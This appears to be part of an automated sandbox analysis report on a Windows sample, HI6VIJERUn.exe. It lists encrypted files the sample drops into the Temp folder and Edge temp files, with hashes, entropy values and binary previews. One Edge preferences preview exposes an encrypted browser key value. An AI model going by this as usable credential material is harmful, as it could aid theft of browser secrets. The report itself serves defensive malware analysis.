                                                                                                                                                                                                                                                                                                        SHA1:F1CB9F55C841456A386E696460E914EFB796C022
                                                                                                                                                                                                                                                                                                        SHA-256:CAAC0BC09DCB90E91547BC1BAF594233380EC95B239F19093217C6BB849D394A
                                                                                                                                                                                                                                                                                                        SHA-512:AF2E1C153ED456E944C8F16679178C761B89FE9ECC6F6260DF8EDE94A9949897F7D39C9F922731162D55012ACCFA137175F843CBDDBE20341E4DEDF9E9736896
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                        Preview:..'.?r.>.Q...3_?......q,n......;1...........I....gQ..\..^.....@.+}..3E.N........b.O.(W5 ..+.7...q...j.b.X.Y_.M.6{.r.)...Y*...;...OC..!.`:[;..I....t........:+ok......L...F.......M......\~.d.wb..f.E.$.zc.&..`.......!....!p\...?=..^"....M$(@...$.....z..h..}.....1.T.aD......&2.6..8..g...@.f.W...H2.nI;o.{H...a..)$..G..N.)`.%...A.........]J...<.....`k..On.A^~B..A0.(..!..-...h.6.kH.m...._.K....`9.?|..I.%y:J.#U...V..l...,.KBO)"5...8.N.h.@..s.....y.....,s...P.d{9.i...C.|.o..M..f...k.3.O....;s..l...C..'/l..._..R..R.#^.,."S....lK>.......5#l......D.+P....le.C....Ap....|.E...%Yc.@...+....I.8.......eV$~:m.@.._.u1.Z...vE...u....g.$....2.Ey.pD..&uA[.T.w... x..Z....LSu&JZ[.....j..3.$>..Lda..,3..%n...p.r(.`..\.....{:.?|.....5D...6uOK.l.>&w%..b...G}...vQ..\.$..2.<+.]O..i..f..g.s..8..S.........^fY.....HQ@x.b0A......G..c.8P.>.F;.#.Q.}....]O..Y.....J....utl.e..s{.1...+`.i.8..)g7+.LP......6..`....O<.-...s3....p.&qY.s.:.x...`.|EP.....S!..Z..............!.$

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Mac

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\HI6VIJERUn.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):78848
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.997658198862451
                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:tzBnxS/0O+n7e0Dpy20GNc1aRFr15e19EGY1doULZwNaYbtjuY:/e0diWpyAGk1A1OPn5mtjR
                                                                                                                                                                                                                                                                                                        MD5:EE9065874D6B4C0F7A083373D3E56661
                                                                                                                                                                                                                                                                                                        SHA1:AC89A45FA3AE31797DCF7FACCA376763A779C3A5
                                                                                                                                                                                                                                                                                                        SHA-256:00905A3582E8FB4246B5F15772E7507E6DFB7225FFB4A196BA29741443EE5FCB
                                                                                                                                                                                                                                                                                                        SHA-512:A54B2F41DE768145E9662F8ADB5C1D19592C5E13E99B87874BF250FC43B76D1C36D2A262E29C4D40DF07684D22B7C960AD67EB7D2180AA8F6B6B8FEF58CDDCE0
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:..F..ApuL...*uf..X~.U..{SA..S...Ju.u..._.jK......_.E..J..'8.g2.Y..4..*=]..&..UB1....-X....F.g...........BY`\.l.lgL...=..j.^|.\.)m..............y g...-.......J*..u.....m..U*2<../....P..&>IT...F..S1.....Tc..H.T.....9....<.......^0@.......9.d.(..Fk...[.G..>.S..$Oe..9u..3..N.ki%....j..`...h...=o...\......2l.9.rf.N....R...jU<w{t....O.[.)...[.{S..{...L.y.P..7..I.F`*..+....P...1.....a.f!z.*N.....9.bg.7....+I.y.nE..7..9....S..k..._.t..`..c.......H..../....~....#..alS.QS^..RQ.U..L....R.P,F.E......:..l.o....0.\k......xL.z.(..;Z.fLu.+.{7S....I_.z>..^...:b..,.....M.....e....p.k.....w..E..R...hfCZ-q6Q..5.+...'..`..t......?..lR...4..d..p.x...S1...t.0Y..D....Q.r......^....Q.k...BZ..q..so.Gt.....o9......x....s...#....\../9........iz.N.h+.......`.3..'..n...qZe.....rc.).7..Rt..>.-xY........f...G<i.....W=.}...-.K.A.~...`...,......Gj}....ju7{q..C.0.~)...P...>2.9...S.m....m..'.ns..;....[....Y.K.../3..~anz..vD|...DMPQ..H?.^..Z"..#.....@..w/.[...i.m.$...S4

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Pasta

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\HI6VIJERUn.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):78848
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.997382672634916
                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:XTSOOYPqBVSG4dmYM6BJMbCxSADceqmg6O+Qw1kiIkCiOIxhNDfn:jSzYqBcnMB685ADceqCYinPtfn
                                                                                                                                                                                                                                                                                                        MD5:3D60B45DB8E320FCD00A2FF02233943B
                                                                                                                                                                                                                                                                                                        SHA1:320FA7ABDBD56FCF034E43EB06E60C6BA1AB704C
                                                                                                                                                                                                                                                                                                        SHA-256:FFD293307D66B1E06D0E19B5ACFA2C84BCF4A2BFAC7C43F36C8A53EEB3691AC2
                                                                                                                                                                                                                                                                                                        SHA-512:3CB8016690B7E471605DC5EF91BA80E501B82E240238B48FB4450CB527F39D92E3DA2A39779ED7479F023E59EC20A48ACD8FE0B484DE116E85260E3AEA91A311
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.......1.L...8@A...X8...1.(\a...tP%m.*..yC-}.l.|..&{.p..m"D]7...o.u(Z.....g..I.F_.G....G.^>...Uh.D@.....(lK.6 ..|..Q.d...C6..g..........`_.F..W4-.0.-~q..$7I.a..\..,{xh&..A.........[......b\..[..{.....f)Lu......I.?{|..W.$.!..jt.z...EXn.... =R...E.......Ei7..9.....W.YHD.".C:.......J\w,..5.....2....P...x..0F...D..W"...Mv(..,j...^.I....5#.......j..p.b,..^.4.F.{..7.a....TK..Fx.7..>._......q.C..-S..{.#.O.^.;@.2....\[.%...,.v.6...2.O.g..H.6`5>.!h....l....H[.F...*.. Y....^...;N."j.9t..' .y.l.e,K.u....!R..R.l}.....w.ps..M.iFyi*..y...k.N;.R.7.Q.V...c,Xrh.j.$.}a..Z.b..|.1...j.#i,'+M......./V[.R;...9.#....d.:.......aly.."'../Z......:.HY ...K.8..WRa*|.?...CR<.r..nq;.~.E{.+.:..W.M$r#3.....L!..M......,...W...!j<.......5t.n[h......x.C.^..[.3..s^.cfL....r~u.:8..*;...NB.$v...7?N....}.j.R3..L..1.'q..w....Pj:zO".4Q..2..i.....U..V.=.......%."...w.m_/....nP.;.._.........Ul;....}...>.....G1..=)..I.$.{.vw....w..`....e~QF...U.I.h<M.....=.2X.p.(...:.7..W.,<kg;]3..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Patricia

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\HI6VIJERUn.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):61440
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.996824883399688
                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:C/jm7jvCrD3AsUdNoa2xw3xHMRtZJ8/ft:UjgC3QsUAhxsHGEXt
                                                                                                                                                                                                                                                                                                        MD5:CD4DD875C656AE228588CF95FE8D6173
                                                                                                                                                                                                                                                                                                        SHA1:109B89832E8CED2D341C845480F8FC227F7D4904
                                                                                                                                                                                                                                                                                                        SHA-256:7507799B024A194079FD1EC97FC18E04930E5AAACF1A129D5F49715B99E719A7
                                                                                                                                                                                                                                                                                                        SHA-512:3B2B7D5EDCADD56746047A369A2D2DE8E5268D3FFC60365B32CE81EC4846D2E22AEEA1F3BABC8FFA2B5A75380DE7BF449B9D3E3EA8AB4F336DAC56DBFE319395
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:U....ij.m.......+e.....x.Ng.f.'..P{..W(dm....S..Qg>......{..~r.......zu.S.mU)..8.O...H.sRH.4.~J..$.A8M.^.0.h..6C...Kd.Y..$y..P.kt..P....VA..IP.5..,.L.IP.u..c:....h.....Nf..A......X3!..Jd.jn..(.ANw..L}...........d..5Hlb.nV.O.w.lME.2_......3.......C.zm.....^S.....WL#..K.a._X.Z...W.Hc..............G..k...T.9..Nj..-U.,.8..g.T..L ....Q.g<. ]Y18E........[>.\cu. `.~D....0..'H.O..v.....qn...:H.w...1....V..\..7......2>..#U.2..D..c.....U...U.V%..6..yV'.$TULNf....r.3do...p|5K...h.aj.n...../Q.5;..2.....|..c.e.K...........$..@.e.,.y.P...0........G..I^...4.I.u....}v.W.f."..db....Z'.c.;..xj....W..!z..(v.....Z*\-.xP.1\.P<M...n...6.k]....7.^....8.Y.Y;.....R.t,^....U.......p.'U.&*%.x2...7{.e..'..[..l/...%.....E..vJu.-[.....$.....o.w_.L.+{k..T.<:.q.S.>= ...&..#...EY}#8...~k_.<7].:f.*cZi.+T..Y.|WI.6...{}.G.@.+..!q. ...P..0p$.V2.o..?...W......?.X.fS..x..=............No.-..&.t...fB=...u..jsm..].k.v.[jX.>..\.1.....C..XC.>.G1.R.. ...5.mC....=...EFjS..=

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Pts

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\HI6VIJERUn.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):100352
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.998253213523132
                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:EFRESsfhWPMj25cOuqbwkrUAgDozO917Lz7MkBI1HtQipSiF3oDdsSCer:TfhWEjOrUAgZ91HzgnN/FYDddCer
                                                                                                                                                                                                                                                                                                        MD5:52B8726EEF2D2820C98AD9E565C58C00
                                                                                                                                                                                                                                                                                                        SHA1:CC310A79422DB7567C99B47D321C18E5652FBC98
                                                                                                                                                                                                                                                                                                        SHA-256:02E429C971DAA2BC2DF3E77374489A1219B96C41C31BDB32E527A81A5437D040
                                                                                                                                                                                                                                                                                                        SHA-512:2253BD71237B3F7BEF75F7A37FC941C05BA4916A2253AFF13BEDC530F10B64335A7C546EBFB998D9D8F69C6CC348032F7A3DA79B0A3FEFEAA03729B27D6CE73B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.dg.....41|.d...a..=.i#\.!..0.|u.*zY.B.X..(...h.c..S...a...c'...G........&....^B..0E5..h.}Ow..n1[......4.b...1....."W..+.......h...t."|.A..x...k.5.15(4....76.*1.#=`<A......G....0I.p....MRO......I:....4bS..XX.du.H..]y.+#Vn1....H.r..,.(2.2.xYd. .....9..h..I.....)w9.wK.........)W....)-q...b..;..Lm.I.....'..p......d\.&......<....n.D.,..4..[|E.g..R...tdl..?...w.A./.V.5.../t,y..+../...D.6SZC.=w.E.hW!.2d.=Q...z...$.F.c.....k+.x...k.A...$\...\......E.Y.k..QykBG.p.J..<..W.......)h...!....#.o1.@@.o>..l5...!C..eQK.....A3.-.L...k..........b.a.c..`...w.l+....#.\..1...S..!...$#O.C>...h...}.W...~..%.gO...H..N.mG..m..:..Th.?.6..A.AK.A.d?..."..y0.\\.;.!..$.....{.\....Z.UX..m..II...o..?$.....0.y.a.vW...... {......m3..Ox{9o`..txC...A.O6.......,...O)."a...t.&.......U.?..........+.cw....S...{.|..?._So.W...E!.KP..t'P.. .b..k..9..(~.._.l...y...~0#..t.....TI....3Q1.(,...'.[6.p..>.!A(*.Gl..w.Q./..=. ,....n....a."...h.o...0...~}k|\.....s..N/?..1.fN......\n|...A]..O.j.c.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Roommate

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\HI6VIJERUn.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):73728
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.997664578458427
                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:PylpNNkcHvZhii33Ttc0sEKU9a2rUzaTIfd5Bp9NB8xYmsECA2IcxXyf2Z:c3ZwUeEz9ZrUzEIfxnwY6CA2IctyuZ
                                                                                                                                                                                                                                                                                                        MD5:BA648412E23DBB484B7F53806FB7B803
                                                                                                                                                                                                                                                                                                        SHA1:3758024AD185A70223D6317989AD40CC39870E3A
                                                                                                                                                                                                                                                                                                        SHA-256:42E89B9FD990512D57C6D12A3E3F128F0859B4BC8F5A9516ED9576C23580FA4C
                                                                                                                                                                                                                                                                                                        SHA-512:D40893A9054EEF33917D2BCE19A478099E47228B8CB9F2CB81A37415468BB3D857C512F972CA6176DEA52756217A4ED9077BF2ACB538607F4825B846E63580E5
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.@qR.T....S.8..@.1.b]..^..C. z..y5..t.+J9....D.....B!..~Y....w...>,.........U.Tft..X.......h..<......a$%...}...HK7....g...Z....^......Ty..J.Sk..A...........W.G;..JW.....f..<..s@<3P.......~9.......~lS.v...B.(..6...&..T\.......h1......].Ptd..qr;.....y.tI7..hZ.]M..R..._#....-...s... @...e..^Qu3).^[QD.y[...Rw....(?*.A.......Y.2S......=z'{..(,.e..9{.....V.R..H.uq.7..H......(.X..Z9..Rv...^...........;..k_.P....Y0.......}=..m..E.....W..om......~U.c......5.......o[P..c....M..7m^i......o...w2U...."b>.}guwr.+...Zx.:.l..d.mC..{..c.._..@!..d.5..0...fz.i..3m.C...L.M.@.2.#....t.z.;.S.M.l,..7...xUr..*x..6S.a.....*:.}..y-......BB2.Je}4C...r.x..h...y.W."...w..76{......,.`t4d.+.x.\^C./.|m:...u...7...X...._.....#...-C.Q.......3..#..(.......4....N....#.i...K.`A.u.>...-....Ntv....*.=_..G...d....L.|YK,?.,-..X\......k......p....<.(._.....A.m....E&aH=M{..6Z.U.@..O....F.I6.....1.J..P.M.W...4]9......|.......;...L..._.y..s........Z.............y.C.y~....A..W....gb

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Tall

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\HI6VIJERUn.exe
                                                                                                                                                                                                                                                                                                        File Type:OpenPGP Public Key
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):88064
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.997688079537067
                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:wJiNKqRVT5kvjtCWYHm9t5vJ8PdBZ7qtWE4IjX1tsw9zgNsi5tp:wYvzTUgHw1JA77ur4Utr9zgNP3p
                                                                                                                                                                                                                                                                                                        MD5:401B52251C1420F48323E9E55201E08B
                                                                                                                                                                                                                                                                                                        SHA1:59E218900BB2134462D8846820EC731AF1E6B4E0
                                                                                                                                                                                                                                                                                                        SHA-256:503689954DB36A90EF85953C267092E1B52A45A7A90941017F5368856E7646A5
                                                                                                                                                                                                                                                                                                        SHA-512:E57D13E4C624309CEA7F58D6E88755558F97F2645C46A576A64BE83833124546F7BC5E4E393EDEEE25DCFF2476C3E7DD8C8FB9A43EAA74B40C484D30C0109121
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:...A......y B.O.~E.<....3.l..'........>s1m.*..[.^.....(..J.%.<.c..a..Y.d.....].nX. .K.|.p.vj.....f3.d....v.l..E!J.......ll8+.Y....]*:........4.U.lK..uO/Y.z.#u.........&_.eA.\8`..v./<.....+..A..=.]..$P... ......0l^n.../..T.$.,.#./g...dy...S..aB.v#.+.`.T)...."...f......."K..[.......)..U.{..C....l.....=.&A.$..?k{...Z..r.^=...~.7.+..d7....Ar...U...b.........;v"u...W.......\..e.4"..K..:.....^.........].Sl....j...*6j.I...t+`.=..Y.6Q%e../.dI.t&.E..y.......V.k.*.g..(;.;....M..../].G..^O..<I.....|~.g.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R{...D.?.'.F...h..............:..Kj5|.:..Kj5|kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..}.R..,P..Myn.2..t.W.....F..-_"..)...:..}.(|.:..Kj5|m.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Terminal

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\HI6VIJERUn.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):97280
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.997913147686059
                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:d4Cj8MCt4LnKaJ1Zri4B3wq4fTOPUka0O0D5FoUZvZAtHrkPOCjEVhFSZul:d47t45Twepa325FZxAtEHbkl
                                                                                                                                                                                                                                                                                                        MD5:124F42DBA4EA1DBFDF40879F3F6093EF
                                                                                                                                                                                                                                                                                                        SHA1:820F5D328A1F6EA7AED8413C2330C8BBE585B07F
                                                                                                                                                                                                                                                                                                        SHA-256:9F74B8DE39D0F3EB2F69CF94552D8A51BDF5D1045321C66002B32A6C86E310E6
                                                                                                                                                                                                                                                                                                        SHA-512:7C62F24BDDF272A9D4C98DEC1F62352198193F861C317507B9C837C99D83B83F50EADE583A253B04FBFD2D8B8D56B06545F2822A99B85D6919D5DC12639104D2
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview::......jT1...z...R.SI...%9..*...A!...~u...L.m..H.pc..$p..8..7.r....eaN9..G3.B@.W....yq<J.#*._...h0re.....0.L.:.......Z.~...ie.k?...w...o.K.zp;......y.+Nv..4..?c.5\..@ca...L[.jx...S.6..|...V#...~A$....(.....w.,........*S..9...2+....V.t..+2k.....k.mDJ./.&.R..<..sii.]*.h.l ...h......e..."..D..$.L.'..C...1....?WD.....<8Lf.Z.4.`lQ.S.By^4..)..mv......%..K..<....L][.Lx........?...cL.%r.....h.......vD..M.N.......NK.6.....H.:#.^Dy}._W.z......;....-<.]j.. ........$.".|...%...h.M6.nm.,%..(.B!.|.W.n.....u.C/......].~..R.Y...%i.gPF...V%~z.{.....VE8.A...<.....I....*.E.......aA..A.mk..YS.......9..I..X.M.c..ZiC:..es..L..y.........`..c.+......o.j./.Z.G....ir.).G...E."w..@.,(.P7...~@(...XT`...bg..&i......}_`.m..4.Ih..I....+x.....QLYY..^.JT..4...w...0,<..!.8U...b._.%.b.;5P=.......;P8..%*J. W..J..4c=....R$....A0.....u...h*1.2.s.d..S..*...76I...B....V..MT.@...W... 71...bl.'^KQ....;..j......... .<6..b.g......_P.. ../..c).......!)/P7.C..V}.J.,...@l.NZ

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\a6d8f9d0-fe91-4d09-8ae3-cce6505ff5d2.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):154477
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                        MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                        SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                        SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                        SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\chr1078.tmp\387e9358-aad6-43ca-949a-5c083f6007f6.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2950
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.615408213885943
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:YuBqDPEFMsFiHC0afrCRDR8/4kHB+adrxSvBcPW+xRxOaJkX7rcGc9aHAaSymSyK:Xq8NkC1frCULB3wvWPXxnJkrrcVaSDSh
                                                                                                                                                                                                                                                                                                        MD5:17875320B02D8363B5EA89DF7BF15968
                                                                                                                                                                                                                                                                                                        SHA1:92652F601E9EBF8F707CAF6459CB8DE88F4C739A
                                                                                                                                                                                                                                                                                                        SHA-256:1E5C421B56413EF77A7B5B7448B31209C7E92F2FC4A5F257BC47BF89C7E07E07
                                                                                                                                                                                                                                                                                                        SHA-512:555D333393A830B1F14C889539080DE810AE9621263FEC8EA06E06680AAAB41348909027C5797D062DA0D45B4846639FA2C5B088D9F144189EF87151C9C0834A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABsqr4+TsbgRqQiJnqCfDkREAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACb1dY6/QNIt1CbsfkuTHPDCc/qEvSXgoyKuCXqsA61uQAAAAAOgAAAAAIAACAAAABdbDvLibb31MTMNHENmFSH6Ad0ilzZGnoIfAGNCw+iGjAAAADTJOjYM3rTc5GL8TSDW9iyqPYLoEyk4qkeP5HGVhhbJO8sQBy1oV4h3v1alFi/JK1AAAAAvc1mUFcSwcXfdNd47XC8+1kT7z4VHksXxgDNSoQvs/cnwP1Fyw95uH3ZfK5xUCZqNzGllQeYu6EQqzyyD3O5KA=="},"policy":{"last_statistics_update":"13379003728677825"},"profile":{"info_ca

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\chr1078.tmp\6052a1d6-34d5-4ba9-b8db-ddb853b2f80e.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2950
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.615408213885943
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:YuBqDPEFMsFiHC0afrCRDR8/4kHB+adrxSvBcPW+xRxOaJkX7rcGc9aHAaSymSyK:Xq8NkC1frCULB3wvWPXxnJkrrcVaSDSh
                                                                                                                                                                                                                                                                                                        MD5:17875320B02D8363B5EA89DF7BF15968
                                                                                                                                                                                                                                                                                                        SHA1:92652F601E9EBF8F707CAF6459CB8DE88F4C739A
                                                                                                                                                                                                                                                                                                        SHA-256:1E5C421B56413EF77A7B5B7448B31209C7E92F2FC4A5F257BC47BF89C7E07E07
                                                                                                                                                                                                                                                                                                        SHA-512:555D333393A830B1F14C889539080DE810AE9621263FEC8EA06E06680AAAB41348909027C5797D062DA0D45B4846639FA2C5B088D9F144189EF87151C9C0834A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABsqr4+TsbgRqQiJnqCfDkREAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACb1dY6/QNIt1CbsfkuTHPDCc/qEvSXgoyKuCXqsA61uQAAAAAOgAAAAAIAACAAAABdbDvLibb31MTMNHENmFSH6Ad0ilzZGnoIfAGNCw+iGjAAAADTJOjYM3rTc5GL8TSDW9iyqPYLoEyk4qkeP5HGVhhbJO8sQBy1oV4h3v1alFi/JK1AAAAAvc1mUFcSwcXfdNd47XC8+1kT7z4VHksXxgDNSoQvs/cnwP1Fyw95uH3ZfK5xUCZqNzGllQeYu6EQqzyyD3O5KA=="},"policy":{"last_statistics_update":"13379003728677825"},"profile":{"info_ca

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\chr1078.tmp\8d3395fe-1829-4e90-bd3e-50a7bbb0901b.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1371
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.548723940528337
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:YpQBqDPak7u5rrtneCCMGDDRgvfyikHxJdXBuBuwBcaCz5Nh+V9XJJQQRCYfYg:YuBqDPafrCRDR8j4gBzBcP5+V95eB0
                                                                                                                                                                                                                                                                                                        MD5:998F4B14DC7CE34A564468858883C72F
                                                                                                                                                                                                                                                                                                        SHA1:23BE915868DFE148573B3A572874146376222565
